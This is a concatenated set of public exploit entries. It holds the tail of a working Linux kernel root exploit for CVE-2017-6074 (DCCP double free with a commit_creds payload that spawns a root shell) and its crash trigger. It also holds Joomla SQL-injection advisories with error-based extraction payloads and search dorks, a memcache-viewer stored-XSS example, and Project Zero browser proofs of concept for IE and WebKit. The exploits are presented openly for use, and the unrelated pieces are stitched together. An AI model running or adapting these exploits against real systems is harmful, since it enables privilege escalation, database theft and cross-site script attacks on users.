    udp_fifo_kmalloc(&uh1, &dummy[0]);

  debug("dccp kfree again:");
  dccp_kfree_again(&dh);

  debug("catch 2");
  for (i = 0; i < CATCH_FIRST; i++)
    udp_fifo_kmalloc(&uh2, &dummy[0]);

  // Step 4: overwrite the aliased memory with the fake skb_shared_info.
  debug("catch 1 -> overwrite");
  for (i = 0; i < CATCH_FIRST; i++) {
    udp_fifo_kfree(&uh1);
    sendmmsg_kmalloc_kfree(port++, &buffer[0]);
  }

  // Step 5: freeing uh2's datagrams is what triggers the callback.
  debug("catch 2 -> free & trigger");
  for (i = 0; i < CATCH_FIRST; i++)
    udp_fifo_kfree(&uh2);

  debug("catch 1 & 2");
  for (i = 0; i < CATCH_AGAIN; i++)
    udp_fifo_kmalloc(&uh3, &dummy[0]);

  printf("[.] done\n");
}
// regparm(3) is an x86-32 calling-convention attribute carried over from older
// exploits; it is documented for x86-32 only and is not expected to matter on
// this x86_64 target.
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
// Kernel symbol addresses for the exact build in the header (4.4.0-62-generic).
// Nothing in this file derives them at runtime (no kallsyms parsing, no KASLR
// handling), so they must be replaced for any other kernel.
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

// Classic privilege-escalation payload: commit_creds(prepare_kernel_cred(0))
// gives the calling task root credentials. This is user-space code that the
// kernel is made to call (kernel_exec), which is why SMEP/SMAP are disabled
// first (see main).
void get_root_payload(void) {
  commit_creds(prepare_kernel_cred(0));
}
// Run get_root_payload() in process context via the double free.
void get_root() {
  void *payload = (void *)&get_root_payload;

  printf("[.] getting root\n");
  kernel_exec(payload);
  printf("[.] should be root now\n");
}
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
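// Replace the current (child) process with an interactive bash, with an empty
// environment. execve() only returns on failure; the original then fell
// through silently, so the forked child went on to run the rest of the
// exploit's main loop alongside the parent. Now the error is reported and the
// child exits without touching the parent's stdio buffers.
void exec_shell() {
  char *shell = "/bin/bash";
  char *args[] = {shell, "-i", NULL};

  execve(shell, args, NULL);
  perror("execve(/bin/bash)");
  _exit(EXIT_FAILURE);
}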
// Fork; the child execs the shell, the parent returns immediately. A failed
// fork is fatal.
void fork_shell() {
  pid_t child = fork();

  switch (child) {
  case -1:
    perror("fork()");
    exit(EXIT_FAILURE);
  case 0:
    exec_shell();
    break;
  default:
    break;
  }
}
// Did the payload work? The uid cannot be trusted here - inside the user
// namespace it already reads 0 - so instead try to open /etc/shadow, which
// only real root can read.
bool is_root() {
  int fd = open("/etc/shadow", O_RDONLY);
  bool ok = (fd != -1);

  if (ok)
    close(fd);
  return ok;
}
// Report the outcome and, on success, spawn the root shell in a child. Either
// way the user is warned not to kill this process: exiting would free the
// groomed socket buffers and crash the kernel, which is also why the shell is
// forked rather than exec'd in place.
void check_root() {
  bool ok;

  printf("[.] checking if we got root\n");
  ok = is_root();
  if (ok)
    printf("[+] got r00t ^_^\n");
  else
    printf("[-] something went wrong =(\n");
  printf("[!] don't kill the exploit binary, the kernel will crash\n");
  if (ok)
    fork_shell();
}
// printf-style write of a single string into an existing file (the file is
// opened without O_CREAT, which is what the /proc/self/* targets need). The
// formatted text is capped at 1023 bytes. Returns true only if the file could
// be opened and the whole string was written in one write().
static bool write_file(const char* file, const char* what, ...)
{
  char text[1024];
  va_list ap;
  int fd, len;
  bool ok;

  va_start(ap, what);
  vsnprintf(text, sizeof(text), what, ap);
  va_end(ap);
  text[sizeof(text) - 1] = '\0';
  len = (int)strlen(text);

  fd = open(file, O_WRONLY | O_CLOEXEC);
  if (fd < 0)
    return false;
  ok = (write(fd, text, len) == len);
  close(fd);
  return ok;
}
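// Enter a fresh user + network namespace so an unprivileged user gets its own
// loopback interface and the capabilities over it that DCCP listeners and
// AF_PACKET sockets need; map the real uid/gid to 0 inside; pin the process to
// CPU 0; bring lo up. Exits on any failure.
//
// The "deny" written to setgroups must precede the gid_map write - since
// Linux 3.19 an unprivileged user may not write gid_map otherwise. Pinning to
// one CPU presumably keeps every allocation on the same per-CPU slab freelist,
// which the groom in kernel_exec*() relies on.
//
// Fixes vs. the original: the unshare(CLONE_NEWNET) error message named
// CLONE_NEWUSER, the setgroups message misnamed the file, and bringing lo up
// now falls back to ip(8) when /sbin/ifconfig is not installed.
void setup_sandbox() {
  int real_uid = getuid();
  int real_gid = getgid();

  if (unshare(CLONE_NEWUSER) != 0) {
    perror("unshare(CLONE_NEWUSER)");
    exit(EXIT_FAILURE);
  }
  if (unshare(CLONE_NEWNET) != 0) {
    perror("unshare(CLONE_NEWNET)");
    exit(EXIT_FAILURE);
  }

  if (!write_file("/proc/self/setgroups", "deny")) {
    perror("write_file(/proc/self/setgroups)");
    exit(EXIT_FAILURE);
  }
  if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
    perror("write_file(/proc/self/uid_map)");
    exit(EXIT_FAILURE);
  }
  if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
    perror("write_file(/proc/self/gid_map)");
    exit(EXIT_FAILURE);
  }

  cpu_set_t my_set;
  CPU_ZERO(&my_set);
  CPU_SET(0, &my_set);
  if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
    perror("sched_setaffinity()");
    exit(EXIT_FAILURE);
  }

  // Loopback starts down in a new network namespace; ::1 must be reachable
  // for the DCCP listeners. Try the original ifconfig invocation first, then
  // iproute2 (ifconfig is absent on many current distributions).
  if (system("/sbin/ifconfig lo up") != 0 &&
      system("ip link set lo up") != 0) {
    perror("system(ifconfig/ip lo up)");
    exit(EXIT_FAILURE);
  }

  printf("[.] namespace sandbox setup successfully\n");
}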
// Sandbox, optionally disable SMEP/SMAP, escalate, verify, then park forever:
// the kernel heap is left inconsistent and the root shell is a child process,
// so this process must never exit (see check_root()).
int main() {
  setup_sandbox();
#if SMEP_SMAP_BYPASS
  disable_smep_smap();
#endif
  get_root();
  check_root();
  for (;;)
    sleep(100);
  return 0;
}
# # # # #
# Exploit Title: Joomla! Component Intranet Attendance Track v2.6.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_intranet
# Date: 25.02.2017
# Vendor Homepage: http://thagatpam.in/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/intranet-attendance-track/
# Demo: http://demo4.thagatpam.in/
# Version: 2.6.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Requires an authenticated session as a regular user; the parameters below are then injectable:
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=3&year=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=promociones&task=landing&idPromocion=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL]
# Etc..
# # # # #
//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A trigger for CVE-2017-6074, crashes kernel.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
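// Minimal CVE-2017-6074 reproducer. WARNING: on an affected kernel this
// crashes the machine (double free in DCCP); run it only in a throw-away VM.
// Sequence: a DCCP listener on ::1 with IPV6_RECVPKTINFO, a client connect(),
// then shutdown()/close() of both sides.
//
// Fixes vs. the original: socket() results are checked so a kernel without
// DCCP reports "no trigger possible" instead of silently doing nothing;
// sizeof(sa1) (28) replaces the hard-coded 0x20, which made the kernel read
// four bytes past the end of the stack struct; and the sockaddr casts remove
// the incompatible-pointer warning recent GCC rejects by default.
int main() {
  struct sockaddr_in6 sa1;
  const struct sockaddr *addr = (const struct sockaddr *)&sa1;
  int optval = 8;
  int s1, s2;

  memset(&sa1, 0, sizeof(sa1));
  sa1.sin6_family = AF_INET6;
  sa1.sin6_port = htons(20002);
  inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
  sa1.sin6_flowinfo = 0;
  sa1.sin6_scope_id = 0;

  s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  if (s1 == -1) {
    perror("socket(SOCK_DCCP)");
    return 1;
  }
  bind(s1, addr, sizeof(sa1));
  listen(s1, 0x9);
  setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, sizeof(optval));

  s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
  if (s2 == -1) {
    perror("socket(SOCK_DCCP)");
    return 1;
  }
  connect(s2, addr, sizeof(sa1));

  shutdown(s1, SHUT_RDWR);
  close(s1);
  shutdown(s2, SHUT_RDWR);
  close(s2);
  return 0;
}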
# Exploit Title: memcache-viewer - Stored XSS
# Date: 2017-02-24
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability
This program does not escape special characters when rendering data read from memcached in the web UI.
If HTML or script is stored in memcached (for example as a key, as shown below), every user who views the page has that code executed in their browser (stored XSS).
### Example Attack code
1. Send Payload(XSS Code) after Connecting to memcached server.
#> telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
add hacked<script>alert(45)</script> 0 900 2
45
STORED
2. Insert data through memcached related 3rd party application.
### Result
Access index.php after memcache-viewer login
DOM Area in index.php
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
PoC: a floated multi-column table row whose layout MSHTML mishandles; the
analysis after the markup explains the crash site and the attacker-controlled
values involved.
-->
<!-- saved from url=(0014)about:internet -->
<!-- (mark-of-the-web above: lets a locally saved copy run script in the Internet zone) -->
<style>
/* class1: the row floats and becomes a 5-column multicolumn container;
   class2: the th and its inner div span all columns with 1px-wide columns. */
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
// Called every 100 ms from onload. Rewriting the stylesheet's media text and
// flipping th1's alignment presumably force repeated restyle/relayout passes;
// the analysis below notes that border-spacing and the first th's width are
// what shape the column-offset array the layout code later misreads.
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
</script>
<body onload="setInterval(boom,100)">
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="5" width=0></th>
<th class="class2" width=0><div class="class2"></div></th>
<!--
Note: The analysis below is based on a 64-bit IE (running in single-process mode) on Windows Server 2012 R2. Microsoft Symbol Server had been down for several days and that was the only configuration for which I had up-to-date symbols. However, Microsoft Edge and 32-bit IE 11 should behave similarly.
The PoC crashes in
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement
when reading from address 0000007800000070
(5fc.8a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=????????????????
With the following call stack:
Child-SP RetAddr Call Site
00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4
00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3
00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c
00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102
00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b
00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5
00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7
00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c
00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f
00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58
00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b
00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a
00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb
00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7
00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8
00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be
00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2
00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e
00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue
00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa
00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac
00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3
00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22
00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34
And the following register values:
rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050
rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0
rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8
r8=0000007916490ec0 r9=000000710e75b980 r10=00000079164a8f30
r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8
r14=000000791648ec60 r15=0000007911ec9f50
Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address.
Let's take a look at the code around the rip of the crash.
00007ffe`8f330a51 488bcd mov rcx,rbp
00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=????????????????
00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
00007ffe`8f330a5f 488bcd mov rcx,rbp
00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax]
00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi]
00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h]
00007ffe`8f330a74 488bcf mov rcx,rdi
00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
00007ffe`8f330a7d 488bce mov rcx,rsi
00007ffe`8f330a80 ffd7 call rdi
On 00007ffe`8f330a51 rcx is loaded from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called, which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns, and its values can be controlled by an attacker (with some limitations).
On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory.
However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the first th element. Let's see what happens if an attacker can point rax to memory he/she controls.
Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80.
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1057
Here's a snippet of Frame::setDocument.
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction();
m_doc = newDocument.copyRef();
...
}
Before setting |m_doc| to |newDocument|, it calls |prepareForDestruction|, which fires unload event handlers. If we call |Frame::setDocument| with the new document |a| and then, inside the unload event handler, call |Frame::setDocument| again with the new document |b|, |prepareForDestruction| will never be called on |b|, which means the frame will never be detached from |b|.
PoC:
-->
// PoC for the Frame::setDocument re-entrancy issue described in the comment
// above: each unload handler navigates the outer frame again while the
// previous navigation is still being torn down, so (per the write-up) the
// document captured below as `doc` is never detached from its frame.
"use strict";
// Outer iframe f, plus a nested iframe a whose unload fires when f is navigated.
let f = document.documentElement.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
// Re-enter navigation of f from inside a's unload handler.
f.src = "javascript:''";
let b = f.contentDocument.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
// Keep a reference to the document that the write-up says is never detached.
let doc = f.contentDocument;
f.onload = () => {
f.onload = () => {
f.onload = null;
// Shows that `doc` still has a frame: a form created in it is submitted to a
// javascript: URL, which reports the location of f (https://abc.xyz/ by then).
let s = doc.createElement("form");
s.action = "javascript:alert(location)";
s.submit();
};
f.src = "https://abc.xyz/";
};
};
};
// Start the chain: navigating f fires a's unload handler.
f.src = "javascript:''";
<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
# # # # #
# Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_communityquiz
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/
# Demo: http://demo.corejoomla.com/quiz.html
# Version: 4.3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communityquiz&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1050
The second argument of window.open is a name for the new window. If there's a frame that has the same name, it will try to load the URL in that frame. If not, it just tries to create a new window as a pop-up, but without the user's click event that attempt will fail.
Here's some snippets.
RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,
DOMWindow& activeWindow, DOMWindow& firstWindow)
{
...
---------------- (1) -----------------------
if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.
// Because FrameTree::find() returns true for empty strings, we must check for empty frame names.
// Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.
if (frameName.isEmpty() || !m_frame->tree().find(frameName))
return nullptr;
}
--------------------------------------------
...
RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);
return result ? result->document()->domWindow() : nullptr;
}
RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction)
{
...
RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);
if (!newFrame)
return nullptr;
...
}
RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created)
{
ASSERT(!features.dialog || request.frameName().isEmpty());
created = false;
---------------- (2) -----------------------
if (!request.frameName().isEmpty() && request.frameName() != "_blank") {
if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {
if (request.frameName() != "_self") {
if (Page* page = frame->page())
page->chrome().focus();
}
return frame;
}
}
--------------------------------------------
<<<<<----------- failed to find the frame, creates a new one.
...
}
The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.
Let's look into |findFrameForNavigation|.
Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument)
{
Frame* frame = m_frame.tree().find(name);
// FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.
if (!activeDocument)
activeDocument = m_frame.document();
if (!activeDocument->canNavigate(frame))
return nullptr;
return frame;
}
bool Document::canNavigate(Frame* targetFrame)
{
...
if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)
if (targetFrame->tree().isDescendantOf(m_frame))
return true;
const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";
if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())
reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";
printNavigationErrorMessage(targetFrame, url(), reason);
return false;
}
...
if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)
return true;
...
return false;
}
There are two points to make |Document::canNavigate| return false.
(1). Using a sandboxed iframe.
<body>
<iframe name="one"></iframe>
<iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>
<script>
function main() {
two.eval('open("https://abc.xyz", "one");');
}
main()
</script>
</body>
(2). Using a cross-origin iframe.
-->
<body>
<iframe name="one"></iframe>
<script>
function main() {
document.body.appendChild(document.createElement("iframe")).contentDocument.location =
"data:text/html,<script>open('https://abc.xyz', 'one')</scri" + "pt>";
}
main()
</script>
</body>
<!--
Tested on Safari 10.0.2 (12602.3.12.0.1).
-->
# # # # #
# Exploit Title: Joomla! Component GPS Tools v4.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_gpstools
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/gps-tools/
# Demo: http://demo.corejoomla.com/tracks.html
# Version: 4.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_gpstools&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
<body>
<script>
/*
Apple WebKit: UXSS via FrameLoader::clear
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
*/
"use strict";
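/**
 * Debug helper: appends a "log: <txt>" line to the page body.
 *
 * The original version appended to `d`, which is not declared at this scope
 * (the only `d` is a `let` inside main's unload handlers), so any call would
 * have thrown a ReferenceError under "use strict". It now appends to
 * document.body. Nothing in this script calls it.
 *
 * @param {*} txt value to display; arrays are joined with ", "
 */
function log(txt) {
if (Array.isArray(txt))
txt = Array.prototype.join.call(txt, ", ");
let c = document.createElement("div");
c.innerText = "log: " + txt;
document.body.appendChild(c);
}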
// Builds a chain of nested iframes whose unload handlers each re-navigate the
// outer frame f. Per the write-up above, FrameLoader::clear attaches the new
// document's window before the old document's unload handlers run, so the
// javascript: URL set in the innermost handler executes in the window of the
// page f is being navigated to.
function main() {
